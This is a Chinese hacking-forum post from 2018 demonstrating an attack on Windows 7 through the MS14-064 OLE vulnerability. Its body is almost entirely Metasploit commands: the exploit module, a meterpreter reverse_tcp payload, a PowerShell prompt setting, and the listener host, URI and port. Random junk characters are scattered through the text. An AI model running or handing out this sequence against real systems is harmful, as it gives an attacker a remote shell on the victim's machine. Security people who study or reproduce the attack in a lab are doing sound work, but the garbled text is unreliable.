找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1406|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

$ u& O# L1 S" x 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示+ T+ i* Y+ u' j- L# K, k% C

" b/ y. `$ ]9 O* ~. l3 p

) P, w2 \ K W) D, V0 q! C 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: % M3 e7 J; K3 W8 P

6 ]6 H! y/ }0 Q! E

0 V F: B$ k. c3 b. q 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp9 H& B" m- I4 Z9 N# g, p

5 H* J A0 }" F1 x) k

. V$ \4 {9 D3 @/ M4 ^             set AllowPowershellPrompt true 3 x( E1 c5 }" m8 k4 N; s

* Z5 B- N" _) E. o

0 H) n1 P! \3 Z" |0 a             Set LHOST 192.168.0.109 * k- c' y) o8 g( |1 Q" e. k

3 o- H B) E2 L* y

/ p: g1 a4 d4 W' Y6 u* I' K             set SRVHOST 192.168.0.109 0 f7 ~; i$ d: t/ t* M

) I: c' a. q* ]" N" D

0 Y5 v$ h9 r5 E! x" d4 D% h             Set uripath share 8 Z5 L, t& A3 y5 Q( l

, b: z7 d' {# f0 n$ \! l

. g; v/ ?& G$ x) s) a; y) P' @) m             Set srvport 807 C1 x5 B$ E! _" M

1 k. u. T3 h1 d9 Z0 R$ U

5 N3 k8 y1 Q5 G( g2 k  " u7 m( V0 u1 U& F

" E% S2 l0 s, N

1 d5 M% y$ {2 t8 k) @8 ^ O   7 J" H* w! r3 C3 Y

. m3 q/ _$ d8 k

* q m9 r. R8 k   / R4 U) H) L% V0 r, h! t; A! B8 b: i

$ G# _5 {" y/ I6 u& o3 [7 n

9 G( V; I) p/ Z& {2 V   ! ^2 g0 D+ k/ ?3 S! k" Y

2 o# v9 n$ d2 O7 ^/ t2 D

+ D5 Z1 a/ ] N& d  : Z* n4 m5 l+ q8 I* \. f) E

% L6 \0 z8 t4 I

; o1 o" o ~) g+ M( Q9 t7 ` 下面我们来访问本地地址如图:7 v0 \ l4 q8 v" j" ~

1 Y- o6 o0 y$ [! U# m

- ?, B9 d& e7 G+ s  6 ]( j6 X; m9 |$ h! |

+ Y i1 {2 _2 q6 Q

2 l; a- S" b0 i   5 P7 S/ U1 ~+ j, Y

% i, W7 r! F: P# M( h. c- i$ v* q

2 V/ W1 h, \5 s) g& C _& H 3 T5 y/ g- W# l, Q- ^

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表